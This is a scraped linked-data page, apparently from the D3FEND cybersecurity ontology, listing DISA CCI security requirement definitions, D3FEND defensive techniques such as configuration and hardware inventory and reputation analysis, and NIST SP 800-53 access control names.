  • "CCI-001774"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system alerts organization-defined personnel or roles when the unauthorized installation of software is detected."

rdfs:label

  • "CCI-001811"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits user installation of software without explicit privileged status."

rdfs:label

  • "CCI-001812"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces access restrictions."

rdfs:label

  • "CCI-001813"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides a warning to organization-defined personnel, roles, and/or locations within an organization-defined time period when allocated audit record storage volume reaches an organization-defined percentage of repository maximum audit record storage capacity."

rdfs:label

  • "CCI-001855"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a real-time alert in an organization-defined real-time period to organization-defined personnel, roles, and/or locations when organization-defined audit failure events requiring real-time alerts occur."

rdfs:label

  • "CCI-001858"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to privileged accounts such that one of the factors is provided by a device separate from the system gaining access."

rdfs:label

  • "CCI-001936"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The device used in the information system implementation of multifactor authentication for network access to privileged accounts meets organization-defined strength of mechanism requirements."

rdfs:label

  • "CCI-001937"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements replay-resistant authentication mechanisms for network access to privileged accounts."

rdfs:label

  • "CCI-001941"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification (PIV) credentials."

rdfs:label

  • "CCI-001953"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification (PIV) credentials."

rdfs:label

  • "CCI-001954"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined out-of-band authentication under organization-defined conditions."

rdfs:label

  • "CCI-001957"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, for PKI-based authentication, implements a local cache of revocation data to support path discovery and validation in case of inability to access revocation information via the network."

rdfs:label

  • "CCI-001991"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for biometric-based authentication, employs mechanisms that satisfy organization-defined biometric quality requirements."

rdfs:label

  • "CCI-002005"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification (PIV) credentials from other federal agencies."

rdfs:label

  • "CCI-002009"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification (PIV) credentials from other federal agencies."

rdfs:label

  • "CCI-002010"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification-I (PIV-I) credentials."

rdfs:label

  • "CCI-002015"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification-I (PIV-I) credentials."

rdfs:label

  • "CCI-002016"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system allows the use of a temporary password for system logons with an immediate change to a permanent password."

rdfs:label

  • "CCI-002041"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined circumstances and/or usage conditions for organization-defined information system accounts."

rdfs:label

  • "CCI-002145"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined discretionary access control policies over defined subjects and objects."

rdfs:label

  • "CCI-002165"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces a role-based access control policy over defined subjects and objects."

rdfs:label

  • "CCI-002169"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of subjects based on organization-defined rules governing the timing of revocations of access authorizations."

rdfs:label

  • "CCI-002178"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of objects based on organization-defined rules governing the timing of revocations of access authorizations."

rdfs:label

  • "CCI-002179"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, uses organization-defined data type identifiers to validate data essential for information flow decisions."

rdfs:label

  • "CCI-002201"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates source by organization, system, application, and/or individual for information transfer."

rdfs:label

  • "CCI-002205"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates destination by organization, system, application, and/or individual for information transfer."

rdfs:label

  • "CCI-002207"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, applies the same security policy filtering to metadata as it applies to data payloads."

rdfs:label

  • "CCI-002211"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides access from a single device to computing platforms, applications, or data residing on multiple different security domains, while preventing any information flow between the different security domains."

rdfs:label

  • "CCI-002218"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents organization-defined software from executing at higher privilege levels than users executing the software."

rdfs:label

  • "CCI-002233"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents non-privileged users from executing privileged functions to include disabling, circumventing, or altering implemented security safeguards/countermeasures."

rdfs:label

  • "CCI-002235"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically locks the account or node for either an organization-defined time period, until the locked account or node is released by an administrator, or delays the next logon prompt according to the organization-defined delay algorithm when the maximum number of unsuccessful logon attempts is exceeded."

rdfs:label

  • "CCI-002238"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in storage."

rdfs:label

  • "CCI-002262"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in process."

rdfs:label

  • "CCI-002263"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in transmission."

rdfs:label

  • "CCI-002264"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system dynamically associates security attributes with organization-defined objects in accordance with organization-defined security policies as information is created and combined."

rdfs:label

  • "CCI-002272"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to define the value of associated security attributes."

rdfs:label

  • "CCI-002277"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the association of organization-defined security attributes to organization-defined subjects."

rdfs:label

  • "CCI-002281"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the association of organization-defined security attributes to organization-defined objects."

rdfs:label

  • "CCI-002282"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the integrity of organization-defined security attributes associated with organization-defined subjects."

rdfs:label

  • "CCI-002283"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the integrity of organization-defined security attributes associated with organization-defined objects."

rdfs:label

  • "CCI-002284"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports the association of organization-defined security attributes with organization-defined subjects by authorized individuals (or processes acting on behalf of individuals)."

rdfs:label

  • "CCI-002289"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports the association of organization-defined security attributes with organization-defined objects by authorized individuals (or processes acting on behalf of individuals)."

rdfs:label

  • "CCI-002290"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements organization-defined techniques or technologies with an organization-defined level of assurance in associating security attributes to information."

rdfs:label

  • "CCI-002302"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with subjects."

rdfs:label

  • "CCI-002306"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with subjects."

rdfs:label

  • "CCI-002307"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with objects."

rdfs:label

  • "CCI-002308"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with objects."

rdfs:label

  • "CCI-002309"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the capability to expeditiously disconnect or disable remote access to the information system within the organization-defined time period."

rdfs:label

  • "CCI-002322"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs organization-defined data mining prevention techniques for organization-defined data storage objects to adequately protect against data mining."

rdfs:label

  • "CCI-002346"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs organization-defined data mining detection techniques for organization-defined data storage objects to adequately detect data mining attempts."

rdfs:label

  • "CCI-002347"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system transmits organization-defined access authorization information using organization-defined security safeguards to organization-defined information systems which enforce access control decisions."

rdfs:label

  • "CCI-002353"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces access control decisions based on organization-defined security attributes that do not include the identity of the user or process acting on behalf of the user."

rdfs:label

  • "CCI-002355"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is tamperproof."

rdfs:label

  • "CCI-002357"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is always invoked."

rdfs:label

  • "CCI-002358"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is small enough to be subject to analysis and testing, the completeness of which can be assured."

rdfs:label

  • "CCI-002359"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically terminates a user session after organization-defined conditions or trigger events requiring session disconnect."

rdfs:label

  • "CCI-002361"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a logout capability for user-initiated communications sessions whenever authentication is used to gain access to organization-defined information resources."

rdfs:label

  • "CCI-002363"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system displays an explicit logout message to users indicating the reliable termination of authenticated communications sessions."

rdfs:label

  • "CCI-002364"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization minimizes the number of nonsecurity functions included within the isolation boundary containing security functions."

rdfs:label

  • "CCI-002381"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements security functions as largely independent modules that maximize internal cohesiveness within modules and minimize coupling between modules."

rdfs:label

  • "CCI-002382"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents unauthorized information transfer via shared resources in accordance with organization-defined procedures when system processing explicitly switches between different information classification levels or security categories."

rdfs:label

  • "CCI-002384"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects against or limits the effects of organization-defined types of denial of service attacks by employing organization-defined security safeguards."

rdfs:label

  • "CCI-002385"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the availability of resources by allocating organization-defined resources based on priority, quota, and/or organization-defined security safeguards."

rdfs:label

  • "CCI-002394"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, in conjunction with a remote device, prevents the device from simultaneously establishing non-remote connections with the system and communicating via some other connection to resources in external networks."

rdfs:label

  • "CCI-002397"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits the identity of internal users associated with denied outgoing communications traffic posing a threat to external information systems."

rdfs:label

  • "CCI-002400"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system only allows incoming communications from organization-defined authorized sources routed to organization-defined authorized destinations."

rdfs:label

  • "CCI-002403"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system blocks both inbound and outbound communications traffic between organization-defined communication clients that are independently configured by end users and external service providers."

rdfs:label

  • "CCI-002409"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability to dynamically isolate/segregate organization-defined information system components from other components of the system."

rdfs:label

  • "CCI-002411"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the confidentiality and/or integrity of information during preparation for transmission."

rdfs:label

  • "CCI-002420"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of information and/or detect changes to information during transmission unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002421"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the confidentiality and/or integrity of information during reception."

rdfs:label

  • "CCI-002422"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect message externals (e.g., message headers and routing information) unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002423"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to conceal or randomize communication patterns unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002425"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a trusted communications path that is logically isolated and distinguishable from other paths."

rdfs:label

  • "CCI-002426"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces organization-defined actions prior to executing mobile code."

rdfs:label

  • "CCI-002460"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides additional data integrity verification artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries."

rdfs:label

  • "CCI-002462"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides data origin artifacts for internal name/address resolution queries."

rdfs:label

  • "CCI-002463"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides data integrity protection artifacts for internal name/address resolution queries."

rdfs:label

  • "CCI-002464"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system requests data origin authentication verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002465"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system requests data integrity verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002466"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system performs data integrity verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002467"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system performs data origin verification authentication on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002468"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system only allows the use of organization-defined certificate authorities for verification of the establishment of protected sessions."

rdfs:label

  • "CCI-002470"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized modification of organization-defined information at rest on organization-defined information system components."

rdfs:label

  • "CCI-002475"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of organization-defined information at rest on organization-defined information system components."

rdfs:label

  • "CCI-002476"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system maintains a separate execution domain for each executing process."

rdfs:label

  • "CCI-002530"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements underlying hardware separation mechanisms to facilitate process separation."

rdfs:label

  • "CCI-002531"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains a separate execution domain for each thread in organization-defined multi-threaded processing."

rdfs:label

  • "CCI-002533"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects organization-defined external and internal wireless links from organization-defined types of signal parameter attacks or references to sources for such attacks."

rdfs:label

  • "CCI-002536"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization physically disables or removes organization-defined connection ports or input/output devices on organization-defined information systems or information system components."

rdfs:label

  • "CCI-002546"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization installs security-relevant software updates within an organization-defined time period of the release of the updates."

rdfs:label

  • "CCI-002605"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs security-relevant firmware updates within an organization-defined time period of the release of the updates."

rdfs:label

  • "CCI-002607"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs organization-defined security-relevant software updates automatically to organization-defined information system components."

rdfs:label

  • "CCI-002613"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs organization-defined security-relevant firmware updates automatically to organization-defined information system components."

rdfs:label

  • "CCI-002614"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization removes organization-defined software components (e.g., previous versions) after updated versions have been installed."

rdfs:label

  • "CCI-002617"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization removes organization-defined firmware components (e.g., previous versions) after updated versions have been installed."

rdfs:label

  • "CCI-002618"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system detects organization-defined unauthorized operating system commands through the kernel application programming interface at organization-defined information system hardware components."

rdfs:label

  • "CCI-002630"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system issues a warning, audits the command execution, or prevents the execution of the command when organization-defined unauthorized operating system commands are detected."

rdfs:label

  • "CCI-002631"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system monitors inbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-002661"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system monitors outbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-002662"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits and/or alerts organization-defined personnel when unauthorized network services are detected."

rdfs:label

  • "CCI-002684"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system discovers indicators of compromise."

rdfs:label

  • "CCI-002688"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system collects indicators of compromise."

rdfs:label

  • "CCI-002689"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system distributes indicators of compromise."

rdfs:label

  • "CCI-002690"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system uses indicators of compromise."

rdfs:label

  • "CCI-002691"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined software at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002710"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined firmware at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002711"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined information at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002712"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically shuts the information system down, restarts the information system, and/or implements organization-defined security safeguards when integrity violations are discovered."

rdfs:label

  • "CCI-002715"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to software."

rdfs:label

  • "CCI-002716"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to firmware."

rdfs:label

  • "CCI-002717"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to information."

rdfs:label

  • "CCI-002718"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, upon detection of a potential integrity violation, provides the capability to audit the event."

rdfs:label

  • "CCI-002723"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, upon detection of a potential integrity violation, initiates one or more of the following actions: generates an audit record; alerts the current user; alerts organization-defined personnel or roles; and/or organization-defined other actions."

rdfs:label

  • "CCI-002724"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system verifies the integrity of the boot process of organization-defined devices."

rdfs:label

  • "CCI-002726"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements organization-defined security safeguards to protect the integrity of boot firmware in organization-defined devices."

rdfs:label

  • "CCI-002729"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to authenticate organization-defined software or firmware components prior to installation."

rdfs:label

  • "CCI-002740"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements spam protection mechanisms with a learning capability to more effectively identify legitimate communications traffic."

rdfs:label

  • "CCI-002743"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides a manual override capability for input validation of organization-defined inputs."

rdfs:label

  • "CCI-002746"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system restricts the use of the manual override capability to only organization-defined authorized individuals."

rdfs:label

  • "CCI-002748"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits the use of the manual override capability."

rdfs:label

  • "CCI-002749"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system validates information output from organization-defined software programs and/or applications to ensure that the information is consistent with the expected content."

rdfs:label

  • "CCI-002771"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined security safeguards to protect its memory from unauthorized code execution."

rdfs:label

  • "CCI-002824"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system restricts the use of maintenance tools to authorized personnel only."

rdfs:label

  • "CCI-002883"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of nonlocal maintenance and diagnostic communications."

rdfs:label

  • "CCI-002890"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements remote disconnect verification at the termination of nonlocal maintenance and diagnostic sessions."

rdfs:label

  • "CCI-002891"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined mandatory access control policies over all subjects and objects."

rdfs:label

  • "CCI-003014"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the confidentiality of nonlocal maintenance and diagnostic communications."

rdfs:label

  • "CCI-003123"

'date published'

contributor

member-of

narrower

Usage (5)

rdfs:label

  • "CCI Catalog v2022-04-05"

rdfs:seeAlso

archived-at

has-member

version

  • "2022-04-05"

Usage (5)

definition

  • "A network agent is software installed on a network node or device that transmits information back to a collector agent or management system. Kinds of network agents include SNMP Agent, IPMI agents, WBEM agents, and many proprietary agents capturing network monitoring and management information."

rdfs:label

  • "Network Agent"

synonym

  • "Exporter"

Usage (5)

rdfs:label

  • "Configuration Database"

contains

Usage (5)

rdfs:label

  • "Configuration Database Record"

synonym

  • "Configuration Record"

Usage (5)

definition

  • "Configuration inventory identifies and records the configuration of software and hardware and their components throughout the organization."

kb-article

  • "## How it works

    The organization retrieves configuration information by means of SNMP (MIB records), WBEM (CIM records), other protocols, or custom scripts and captures that information in a repository, typically known as a Configuration Management Database (CMDB)."

rdfs:label

  • "Configuration Inventory"

d3fend-id

  • "D3-CI"

inventories

kb-reference

Usage (5)

comment

  • "A resource used to configure a system including software and hardware."

rdfs:label

  • "Configuration Resource"

Usage (5)

comment

  • "A create socket system call creates an endpoint for communication and returns a file descriptor that refers to that endpoint."

rdfs:label

  • "Create Socket"

rdfs:seeAlso

  • https://www.man7.org/linux/man-pages/man2/socket.2.html

Usage (5)

comment

  • "D3FEND things are concepts defined in the core D3FEND Framework."

rdfs:label

  • "D3FEND Thing"

Usage (5)

comment

  • "Defense Information Systems Agency (DISA) Field Security Office (FSO)"

rdfs:label

  • "DISA FSO"

Usage (5)

rdfs:label

  • "Data Dependency"

synonym

  • "Transactional Dependency"

Usage (5)

definition

  • "Data exchange mapping identifies and models the organization's intended design for the flows of the data types, formats, and volumes between systems at the application layer."

rdfs:label

  • "Data Exchange Mapping"

synonym

  • "Data Flow Mapping"
  • "Information Exchange Mapping"

d3fend-id

  • "D3-DEM"

kb-reference

maps

Usage (5)

definition

  • "Data inventorying identifies and records the schemas, formats, volumes, and locations of data stored and used on the organization's architecture."

rdfs:label

  • "Data Inventory"

synonym

  • "Data Discovery"
  • "Data Inventorying"

d3fend-id

  • "D3-DI"

inventories

kb-reference

Usage (5)

rdfs:label

  • "Database File"

Usage (5)

comment

  • "A dependency is the relationship of relying on or being controlled by someone or something else. This class reifies dependencies that correspond to the object property depends-on."

rdfs:label

  • "Dependency"

rdfs:seeAlso

dependent

provider

Usage (5)

comment

  • "A digital system is a group of interacting or interrelated digital artifacts that act according to a set of rules to form a unified whole. A digital system, surrounded and influenced by its environment, is described by its boundaries, structure and purpose and expressed in its functioning. Systems are the subjects of study of systems theory."

rdfs:label

  • "Digital System"

rdfs:seeAlso

  • http://dbpedia.org/resource/System

Usage (5)

definition

  • "Analyzing the reputation of a domain name."

rdfs:label

  • "Domain Name Reputation Analysis"

analyzes

d3fend-id

  • "D3-DNRA"

kb-reference

Usage (5)

'has icon'

  • "file-hash.svg"

rdfs:label

  • "File Hash"

identifies

Usage (5)

definition

  • "Analyzing the reputation of a file hash."

rdfs:label

  • "File Hash Reputation Analysis"

analyzes

d3fend-id

  • "D3-FHRA"

kb-reference

Usage (5)

isDefinedBy

Usage (5)

rdfs:label

  • "Get Open Sockets"

Usage (5)

rdfs:label

  • "Get Open Windows"

Usage (5)

rdfs:label

  • "Get Running Processes"

Usage (5)

rdfs:label

  • "Get Screen Capture"

Usage (5)

rdfs:label

  • "Get System Config Value"

rdfs:seeAlso

Usage (5)

rdfs:label

  • "Get System Network Config Value"

Usage (5)

definition

  • "Hardware component inventorying identifies and records the hardware items in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on hardware devices such as peripherals, NICs, processors, and memory devices that are components of the computers in their architecture using a variety of administrative and management tools that query for this information. In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through remote administration tools and system commands, either manually or using scripts.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiring administrative tools.

    ## Examples
    * Bus discovery
    * Admin-scripted PCI Bus inventory using ssh and pciutils
    * Application-layer discovery
    * Simple Network Management Protocol (SNMP) collects MIB information
    * Web-based Enterprise Management (WBEM) collects CIM information
    * Windows Management Instrumentation (WMI)
    * Windows Management Infrastructure (MI)"

rdfs:label

  • "Hardware Component Inventory"

synonym

  • "Hardware Component Discovery"
  • "Hardware Component Inventorying"

d3fend-id

  • "D3-HCI"

inventories

kb-reference

Usage (5)

comment

  • "An Internet Protocol address (IP address) is a numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication. An IP address serves two main functions: host or network interface identification and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. IPv6 deployment has been ongoing since the mid-2000s."

isDefinedBy

  • http://dbpedia.org/resource/IP_address

rdfs:label

  • "IP Address"

identifies

Usage (5)

definition

  • "Analyzing the reputation of an IP address."

rdfs:label

  • "IP Reputation Analysis"

analyzes

d3fend-id

  • "D3-IPRA"

kb-reference

Usage (5)

definition

  • "Analyzing the reputation of an identifier."

rdfs:label

  • "Identifier Reputation Analysis"

d3fend-id

  • "D3-IRA"

kb-reference

Usage (5)

rdfs:label

  • "Logical Link"

Usage (5)

definition

  • "Logical link mapping creates a model of existing or previous node-to-node connections using network-layer data or metadata."

rdfs:label

  • "Logical Link Mapping"

d3fend-id

  • "D3-LLM"

kb-reference

maps

Usage (5)

definition

  • "The model tactic is used to apply security engineering, vulnerability, threat, and risk analyses to digital systems. This is accomplished by creating and maintaining a common understanding of the systems being defended, the operations on those systems, actors using the systems, and the relationships and interactions between these elements."

display-priority

  • 1

rdfs:label

  • "Model"

display-order

  • -1

Usage (5)

comment

  • "Digital video files which often contain audio."

rdfs:label

  • "Multimedia Document File"

rdfs:seeAlso

Usage (5)

rdfs:label

  • "NIST SP 800-53 R3"

rdfs:seeAlso

archived-at

version

  • 3

Usage (5)

rdfs:label

  • "NIST SP 800-53 R4"

rdfs:seeAlso

archived-at

version

  • 4

Usage (5)

rdfs:label

  • "NIST SP 800-53 R5"

rdfs:seeAlso

archived-at

has-member

version

  • 5

Usage (5)

rdfs:label

  • "AC-17(8)"

broader

control-name

  • "Remote Access | Disable Nonsecure Network Protocols"

member-of

Usage (5)

rdfs:label

  • "AC-23"

control-name

  • "Data Mining Protection"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24"

control-name

  • "Access Control Decisions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24(1)"

control-name

  • "Access Control Decisions | Transmit Access Authorization Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24(2)"

control-name

  • "Access Control Decisions | No User or Process Identity"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(1)"

broader

control-name

  • "Account Management | Automated System Account Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(13)"

control-name

  • "Account Management | Disable Accounts for High-risk Individuals"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(2)"

broader

control-name

  • "Account Management | Automated Temporary and Emergency Account Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(3)"

broader

control-name

  • "Account Management | Disable Accounts"

member-of

Usage (5)

rdfs:label

  • "AC-2(4)"

control-name

  • "Account Management | Automated Audit Actions"

member-of

Usage (5)

rdfs:label

  • "AC-2(5)"

control-name

  • "Account Management | Inactivity Logout"

member-of

Usage (5)

rdfs:label

  • "AC-2(6)"

broader

control-name

  • "Account Management | Dynamic Privilege Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(7)"

control-name

  • "Account Management | Privileged User Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(9)"

control-name

  • "Account Management | Restrictions on Use of Shared and Group Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3"

control-name

  • "Access Enforcement"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3(11)"

control-name

  • "Access Enforcement | Restrict Access to Specific Information Types"

